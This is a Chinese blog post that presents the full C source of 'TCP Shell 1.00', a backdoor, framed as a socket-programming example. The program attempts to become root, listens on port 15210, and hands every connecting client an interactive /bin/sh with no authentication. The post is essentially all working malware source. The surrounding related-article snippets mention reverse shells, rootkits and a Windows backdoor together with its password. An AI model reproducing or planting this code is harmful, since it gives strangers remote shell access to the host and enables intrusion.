socket编程例子:TCP Shell后门

最新推荐文章于 2023-04-21 12:40:59 发布
最新推荐文章于 2023-04-21 12:40:59 发布
阅读量1.1k 收藏
点赞数
分类专栏: 【安全教学】 【C Programming】 文章标签: socket 编程 shell tcp stream null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmsdr/article/details/88255
版权

                                               socket编程例子:TCP Shell后门  

                                 很简单很容易被发现,且当作socket编程例子学习吧。

/*=============================================================================
   TCP Shell Version 1.00
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (unewn4th@usa.net)
  =============================================================================
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define MAX_CLIENTS     5           /* Max client num    */
#define PORT_NUM        15210       /* Port              */

void    get_connection(socket_type, port, listener)
int     socket_type;
int     port;
int     *listener;
{
        struct sockaddr_in      address;
        struct sockaddr_in      acc;
        int                     listening_socket;
        int                     connected_socket = -1;
        int                     new_process;
        int                     reuse_addr = 1;
        int                     acclen=sizeof(acc);

        memset((char *) &address, 0, sizeof(address));
        address.sin_family = AF_INET;
        address.sin_port = htons(port);
        address.sin_addr.s_addr = htonl(INADDR_ANY);
        listening_socket = socket(AF_INET, socket_type, 0);
        if (listening_socket < 0) {
          perror("socket");
          exit(1);
        }
        if (listener != NULL) *listener = listening_socket;
        setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
                   (void *)&reuse_addr,sizeof(reuse_addr));
        if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0
){
          perror("bind");
          close(listening_socket);
          exit(1);
        }
        if (socket_type == SOCK_STREAM){
          if (listen(listening_socket, MAX_CLIENTS)==-1){
            perror("listen");
            exit(1);
         }
        }
}
void    sock_puts(sockfd, str)
int     sockfd;
char    *str;
{
        char    x[2000],*buf;
        size_t  bytes_sent = 0;
        int     this_write,count;

        sprintf(x,"/r%s",str);
        count=strlen(x);
        buf=x;
        while (bytes_sent < count) {
                do
                        this_write = write(sockfd, buf, count - bytes_sent);
                while ( (this_write < 0) && (errno == EINTR) );
                if (this_write <= 0) return;
                bytes_sent += this_write;
                buf += this_write;
        }
}
int     main(argc, argv)
int     argc;
char    *argv[];
{
        void            get_connection();
        void            sock_puts();
        int             i,sz;
        int             sock;
        static int      listensock = -1;
        struct sockaddr_in sad;

        setuid(0);
        setgid(0);

        for (;;){
          get_connection(SOCK_STREAM, PORT_NUM, &listensock);
          sz=sizeof(struct sockaddr_in);
          for (;;){
            if ((sock=accept(listensock,(void *)&sad,&sz))==-1){
                perror("Accept");
                exit(1);
            }
            if (fork()==0){
                sock_puts(sock,"The ShadowPenguin Systems Inc. TCP Shell 1.00 De
veloped by 

UNYUN./n");
                for (i=0;i<3;i++){
                    close(i); dup2(sock,i);
                }
                execl("/bin/sh","sh","-i",0);
                close(sock);     
                break;
            }
          }
        }
}

bmsdr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络基础学习系列二(socket编程)
sakeww的博客
07-14 818
socket编程
shell建立socket连接
任我行的博客
12-20 5554
建立socket的两种方式 udp:/dev/udp/host/port tcp:/dev/tcp/host/port 直接重定向当前shell的一个文件描述符到对应的ip/端口: exec 8<>/dev/udp/10.0.2.15/12345 就相当于建立一个UDP socket。 发送报文: echo “” >&8 使用tcpdump抓包: 00:48:18.291...
生命在于学习——Socket编程(偏安全方面)
易水哲的博客
10-16 1305
Socket编程的记录,偏安全方面。
Linux Shell脚本编程--nc命令使用详解
热门推荐
上善若水,水善利万物而不争。
08-25 3万+
linux nc命令使用详解     功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g网关...>][-G指向器数目>][-i延迟秒数>][-o输出文件>][-p通信端口>][-s来源位址>][-v...][-w超时秒数>][主机名称][通信端口...] 参 数:  -g网关>  设置路由器跃程通信网关,最丢哦可设置8个。  -G指向器数目>  设置来源路由指
操作系统大作业---信号量+shell脚本+socket
最新发布
ZZU_LGY
04-21 1388
分析过程:分析中涉及到一个问题1210运行结果当生产一个车轮和车架所用时间一样,都为1s时,可以看出车轮明显不够用,车架过载因此把车轮和车架生产时间改为1:2,就会出现车轮和车架趋于平稳,不会造成挤压。2、编写一个用于检查关于命令“lspxct"的实验报告的Shell脚本,该脚本检查命令的执行结果中是否存在包含“px”和“ct”的文件或目录,显示包含“px”的文件或目录数,包含“ct”的文件或目录数。如果两者的文件或目录数均大于0,则对该实验项目给予100分。
自己用python写的后门
09-01
- 监听特定端口:通过Python的socket库,可以设置一个服务器来监听特定的TCP或UDP端口,等待客户端连接。 - 隐藏执行:为了防止被轻易发现,后门可能会被设计成在后台运行,不显示任何界面或日志。 - 远程命令...
远程打开shell实例(VC)
03-17
Winsock是Windows下的Socket接口,遵循Berkeley套接字API,用于实现TCP/IP协议通信。 2. **TCP连接**:实例可能使用TCP协议建立稳定、面向连接的通信链路,确保数据可靠传输。 3. **服务器端编程**:`Openshell_...
php-reverse-shell
07-24
- **恶意活动**:黑客可能会植入PHP反向Shell作为后门,长期控制目标服务器。 **安全防范** 为了防止PHP反向Shell的滥用,应采取以下措施: 1. **代码审查**:定期进行代码审计,查找不安全的函数使用。 2. **...
RootkitDemo:研一时期的工程实践,一个linux下的root kit程序,能够实现远程访问,获取shell,隐藏文件进程端口
05-23
#Rootkit工程实践本仓库保存了研一阶段工程实践,...###src/netstat端口信息隐藏,能够隐藏后门程序打开的端口信息,通过劫持netstat程序中读取/proc/net/tcp以及udp文件中的信息,修改系统调用的输出结果,删除其中
反向壳备忘单::upside-down_face:反向壳备忘单:upside-down_face:
01-30
在网络安全领域,特别是渗透测试和红队操作中,反向壳(Reverse Shell)是一种常用的技巧,它允许攻击者在目标系统上建立一个后门,以便远程控制受害主机。本备忘单将深入探讨反向壳的概念、工作原理以及如何在不同...
利用socket编程实现的网络版shell命令解释器
04-30
利用socket编程实现的网络版shell命令解释器 内含两个代码包:分别用不同思路实现的
linux 下的shell socket实现聊天室
04-10
管道实现socket,资源资源包含服务器端和客服端。
Linux socket编程实例:echo服务器程序
01-03
Linux socket编程实例:echo服务器程序
端口复用版winshell编写的后门程序源代码
09-18
Wxhshell 最近的练手作品,主要练习C的socket编程, 本后门以服务方式运行,采用端口复用技术, 一般来说除了采用独占模式开的端口,都可复用. 在2000/xp+vc 8.0下测试通过 经测试,可复用21,80端口没有问题. 只是练习作品,附上源代码,大家可以随意修改 使用说明: //----------------------------------------------------------------------------------------- --// // WxhShell V1.0 // //----------------------------------------------------------------------------------------- -// 作者:虚幻灵者 组织:火狐网络安全技术联盟 参考:Winshell wxhshell v1.0是根据winshell编写的。winshell是一个非常不错的后门程序,但是现在已经 有些过时了,于是写了一个新的wxhshell,在这款后门里采用了端口复用技术,因此可 以突破一些防火墙。其运行不影响正常端口的工作。 注意:本后门对于采用了独占方式的端口无法绑定,经测试XP系统端口135,445,1025,1028, 1045无法绑定,其他端口基本上都可以。由于当前的防火墙对系统端口屏蔽比较严,因此这 应该算不上缺陷。 用UPX压缩后还不到35k,比winshell还小。可以说在后门里算是非常小的了。 密码:xuhuanlingzhe 服务名:Wxhshell 服务显示名:Wxhshell Service 服务描述信息:Wrsky Windows CmdShell Service 注册表键名:Wxhshell 默认端口:5000 最大连接数:100
Linux系统shell查看SOCKET情况和socket编程概述
$好记性还是要多记录$
04-18 3920
Linux系统中,查看SOCKET使用情况可以使用ss命令。 1、命令格式: ss [参数] ss [参数] [过滤] 2、命令功能: ss(Socket Statistics的缩写)命令可以用来获取 socket统计信息,此命令输出的结果类似于 netstat输出的内容,但它能显示更多更详细的 TCP连接状态的信息,且比 netstat 更快速高效。它使用了 TCP协议栈中 tcp_diag(是...
Linux的SOCKET编程详解
boshuzhang的专栏
04-23 423
Linux的SOCKET编程详解 标签: socketlinux服务器struct网络 2012-04-10 17:44 85634人阅读 评论(17) 收藏 举报  分类:   Linux(21)  c/c++(22)  socket网络编程(7)  版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+]
linux脚本发送socket报文,linux编写shell脚本程序实例1-生成TCP活动状况报告
weixin_33623088的博客
05-01 1870
年轻人要讲抄德,抄袭作业又蠢又坏,大家耗子尾汁题目介绍生成TCP活动状况报告:编写shell脚本程序,每隔一分钟生成一行信息,包括当前时间,这一分钟内TCP发送了多少报文,接收了多少报文,收发报文总数(行尾给出+或-或空格,+表示这分钟收发报文数比上分钟多10包以上,差别在10包或以内的用空格,其余用-)运行结果如下(tracetcp.sh是自己写的脚本程序): 具体操作步骤1、根据输出的格式,我...
Python Basic - Socket编程-不同主机间交互
HuangFei
09-25 720
family=AF_INNET 是ipv4下面的参数 ,用于不同主机之间的通信 family=AF_INNET6 是ipv6下面的参数 ,用于不同主机之间的通信 family=AF_UNIX 在unix上不同的里程之间进行通信时使用。linux本地的socket文件。 type=SOCK_STREAM / SOCK_Dgram 流式(对于建立TCP连接的时候) 数据式(对于建立UDP连接) type=SOCK_ROW 这两个参数都有默认值,所以在写socket.socket() ...
Shell】通过shell脚本调用tcp/udp socket
R_W_zhang的博客
12-11 4979
bashshell的内置功能之一是通过/dev/tcp和/dev/udp设备文件打开TCP / UDP套接字。 以下介绍如何在shell中使用tcp/udp socket 在Bash Shell中打开或关闭TCP / UDP套接字 语法: $ exec {file-descriptor} </ dev / {protocol} / {host} / {port} fi...
Linuxsocket编程入门借鉴.pdf
12-25
"《Linux socket编程入门(一):TCP server端》是一篇由龙飞作者撰写的教程,旨在介绍Linux socket编程的基础知识。文章首先指出,尽管socket编程涉及的TCP/IP体系庞大,但实际开发中主要关注的是其中的TCP和UDP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值